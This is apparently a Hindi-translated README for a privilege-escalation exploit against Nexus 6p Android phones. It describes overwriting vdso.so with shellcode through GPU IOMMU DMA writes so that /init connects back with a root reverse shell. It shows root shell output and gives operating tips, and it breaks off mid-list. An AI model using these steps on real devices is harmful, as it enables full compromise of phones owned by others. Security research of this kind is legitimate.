
GPU IOMMU DMA एक्सप्लॉइट एंड्रॉइड उपकरणों के लिए जो vdso.so को shellcode से ओवरराइट करके विशेषाधिकार बढ़ाता है और Nexus 6p पर एक रिवर्स रूट शेल उत्पन्न करता है।
नेक्सस 6p (google/angler/angler:6.0.1/MMB29M/2431559:user/release-keys) पर परीक्षण किया गया
2016 में Blackhat EU के माध्यम से चर्चा की गई
iommu dma लेखन के साथ, vdso.so शेलकोड से अधिलेखित हो जाता है।
तो /init द्वारा __kernel_clock_gettime निष्पादित करने के बाद, शेलकोड निष्पादित हो जाएगा।
/init प्रक्रिया फिर एक रूट शेल के साथ वापस जुड़ती है।
Reverse shell target: 127.0.0.1:4919
shellcode patch done
hook patch done
Waiting for reverse connect shell...
TERMINAL>>>
id
uid=0(root) gid=0(root) groups=0(root) context=u:r:init:s0
एक्सप्लॉइट से पहले /data/local/tmp/x को हटा दें यदि कोई हो।
यदि प्रतीक्षा समय बहुत लंबा है, तो अपने फोन की सेटिंग्स में "Time and Date" विकल्प खोलने का प्रयास करें।
Adreno के संस्करण की जाँच करें, वर्तमान में यह 4xx के लिए बनाया गया है।
5xx और उससे ऊपर के लिए: